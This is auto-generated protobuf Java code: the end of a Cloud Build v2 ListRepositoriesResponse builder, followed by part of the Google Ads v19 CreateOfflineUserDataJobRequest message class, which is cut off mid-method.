result.repositories_ = repositories_; } else { result.repositories_ = repositoriesBuilder_.build(); } } private void buildPartial0(com.google.cloudbuild.v2.ListRepositoriesResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public 
Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloudbuild.v2.ListRepositoriesResponse) { return mergeFrom((com.google.cloudbuild.v2.ListRepositoriesResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloudbuild.v2.ListRepositoriesResponse other) { if (other == com.google.cloudbuild.v2.ListRepositoriesResponse.getDefaultInstance()) return this; if (repositoriesBuilder_ == null) { if (!other.repositories_.isEmpty()) { if (repositories_.isEmpty()) { repositories_ = other.repositories_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureRepositoriesIsMutable(); repositories_.addAll(other.repositories_); } onChanged(); } } else { if (!other.repositories_.isEmpty()) { if (repositoriesBuilder_.isEmpty()) { repositoriesBuilder_.dispose(); repositoriesBuilder_ = null; repositories_ = other.repositories_; bitField0_ = (bitField0_ & ~0x00000001); repositoriesBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getRepositoriesFieldBuilder() : null; } else { repositoriesBuilder_.addAllMessages(other.repositories_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloudbuild.v2.Repository m = input.readMessage( com.google.cloudbuild.v2.Repository.parser(), extensionRegistry); if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.add(m); } else { repositoriesBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloudbuild.v2.Repository> repositories_ = java.util.Collections.emptyList(); private void ensureRepositoriesIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { repositories_ = new java.util.ArrayList<com.google.cloudbuild.v2.Repository>(repositories_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloudbuild.v2.Repository, com.google.cloudbuild.v2.Repository.Builder, com.google.cloudbuild.v2.RepositoryOrBuilder> 
repositoriesBuilder_; /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public java.util.List<com.google.cloudbuild.v2.Repository> getRepositoriesList() { if (repositoriesBuilder_ == null) { return java.util.Collections.unmodifiableList(repositories_); } else { return repositoriesBuilder_.getMessageList(); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public int getRepositoriesCount() { if (repositoriesBuilder_ == null) { return repositories_.size(); } else { return repositoriesBuilder_.getCount(); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.Repository getRepositories(int index) { if (repositoriesBuilder_ == null) { return repositories_.get(index); } else { return repositoriesBuilder_.getMessage(index); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder setRepositories(int index, com.google.cloudbuild.v2.Repository value) { if (repositoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureRepositoriesIsMutable(); repositories_.set(index, value); onChanged(); } else { repositoriesBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of Repositories. 
* </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder setRepositories( int index, com.google.cloudbuild.v2.Repository.Builder builderForValue) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.set(index, builderForValue.build()); onChanged(); } else { repositoriesBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addRepositories(com.google.cloudbuild.v2.Repository value) { if (repositoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureRepositoriesIsMutable(); repositories_.add(value); onChanged(); } else { repositoriesBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addRepositories(int index, com.google.cloudbuild.v2.Repository value) { if (repositoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureRepositoriesIsMutable(); repositories_.add(index, value); onChanged(); } else { repositoriesBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addRepositories(com.google.cloudbuild.v2.Repository.Builder builderForValue) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.add(builderForValue.build()); onChanged(); } else { repositoriesBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of Repositories. 
* </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addRepositories( int index, com.google.cloudbuild.v2.Repository.Builder builderForValue) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.add(index, builderForValue.build()); onChanged(); } else { repositoriesBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addAllRepositories( java.lang.Iterable<? extends com.google.cloudbuild.v2.Repository> values) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, repositories_); onChanged(); } else { repositoriesBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder clearRepositories() { if (repositoriesBuilder_ == null) { repositories_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { repositoriesBuilder_.clear(); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder removeRepositories(int index) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.remove(index); onChanged(); } else { repositoriesBuilder_.remove(index); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.Repository.Builder getRepositoriesBuilder(int index) { return getRepositoriesFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of Repositories. 
* </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.RepositoryOrBuilder getRepositoriesOrBuilder(int index) { if (repositoriesBuilder_ == null) { return repositories_.get(index); } else { return repositoriesBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public java.util.List<? extends com.google.cloudbuild.v2.RepositoryOrBuilder> getRepositoriesOrBuilderList() { if (repositoriesBuilder_ != null) { return repositoriesBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(repositories_); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.Repository.Builder addRepositoriesBuilder() { return getRepositoriesFieldBuilder() .addBuilder(com.google.cloudbuild.v2.Repository.getDefaultInstance()); } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.Repository.Builder addRepositoriesBuilder(int index) { return getRepositoriesFieldBuilder() .addBuilder(index, com.google.cloudbuild.v2.Repository.getDefaultInstance()); } /** * * * <pre> * The list of Repositories. 
* </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public java.util.List<com.google.cloudbuild.v2.Repository.Builder> getRepositoriesBuilderList() { return getRepositoriesFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloudbuild.v2.Repository, com.google.cloudbuild.v2.Repository.Builder, com.google.cloudbuild.v2.RepositoryOrBuilder> getRepositoriesFieldBuilder() { if (repositoriesBuilder_ == null) { repositoriesBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloudbuild.v2.Repository, com.google.cloudbuild.v2.Repository.Builder, com.google.cloudbuild.v2.RepositoryOrBuilder>( repositories_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); repositories_ = null; } return repositoriesBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * A token identifying a page of results the server should return. 
* </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.devtools.cloudbuild.v2.ListRepositoriesResponse) } // @@protoc_insertion_point(class_scope:google.devtools.cloudbuild.v2.ListRepositoriesResponse) private static final com.google.cloudbuild.v2.ListRepositoriesResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloudbuild.v2.ListRepositoriesResponse(); } public static com.google.cloudbuild.v2.ListRepositoriesResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final 
com.google.protobuf.Parser<ListRepositoriesResponse> PARSER = new com.google.protobuf.AbstractParser<ListRepositoriesResponse>() { @java.lang.Override public ListRepositoriesResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListRepositoriesResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListRepositoriesResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloudbuild.v2.ListRepositoriesResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,977
google-ads-stubs-v19/src/main/java/com/google/ads/googleads/v19/services/CreateOfflineUserDataJobRequest.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v19/services/offline_user_data_job_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v19.services; /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v19.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest} */ public final class CreateOfflineUserDataJobRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) CreateOfflineUserDataJobRequestOrBuilder { private static final long serialVersionUID = 0L; // Use CreateOfflineUserDataJobRequest.newBuilder() to construct. private CreateOfflineUserDataJobRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CreateOfflineUserDataJobRequest() { customerId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CreateOfflineUserDataJobRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.Builder.class); } private int 
bitField0_; public static final int CUSTOMER_ID_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ @java.lang.Override public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ @java.lang.Override public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int JOB_FIELD_NUMBER = 2; private com.google.ads.googleads.v19.resources.OfflineUserDataJob job_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ @java.lang.Override public boolean hasJob() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. 
*/ @java.lang.Override public com.google.ads.googleads.v19.resources.OfflineUserDataJob getJob() { return job_ == null ? com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance() : job_; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { return job_ == null ? com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance() : job_; } public static final int VALIDATE_ONLY_FIELD_NUMBER = 3; private boolean validateOnly_ = false; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } public static final int ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER = 5; private boolean enableMatchRateRangePreview_ = false; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. 
*/ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getJob()); } if (validateOnly_ != false) { output.writeBool(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { output.writeBool(5, enableMatchRateRangePreview_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getJob()); } if (validateOnly_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(5, enableMatchRateRangePreview_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest)) { return super.equals(obj); } com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest other = 
(com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) obj; if (!getCustomerId() .equals(other.getCustomerId())) return false; if (hasJob() != other.hasJob()) return false; if (hasJob()) { if (!getJob() .equals(other.getJob())) return false; } if (getValidateOnly() != other.getValidateOnly()) return false; if (getEnableMatchRateRangePreview() != other.getEnableMatchRateRangePreview()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + CUSTOMER_ID_FIELD_NUMBER; hash = (53 * hash) + getCustomerId().hashCode(); if (hasJob()) { hash = (37 * hash) + JOB_FIELD_NUMBER; hash = (53 * hash) + getJob().hashCode(); } hash = (37 * hash) + VALIDATE_ONLY_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getValidateOnly()); hash = (37 * hash) + ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getEnableMatchRateRangePreview()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public 
static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static 
com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v19.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. 
* </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.Builder.class); } // Construct using com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getJobFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; customerId_ = ""; job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } validateOnly_ = false; enableMatchRateRangePreview_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return 
com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override public com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest build() { com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest buildPartial() { com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest result = new com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.customerId_ = customerId_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.job_ = jobBuilder_ == null ? 
job_ : jobBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000004) != 0)) { result.validateOnly_ = validateOnly_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.enableMatchRateRangePreview_ = enableMatchRateRangePreview_; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) { return mergeFrom((com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest other) { if (other == com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.getDefaultInstance()) return this; if (!other.getCustomerId().isEmpty()) { customerId_ = other.customerId_; bitField0_ |= 0x00000001; onChanged(); } if (other.hasJob()) { mergeJob(other.getJob()); } if (other.getValidateOnly() != false) { setValidateOnly(other.getValidateOnly()); } if 
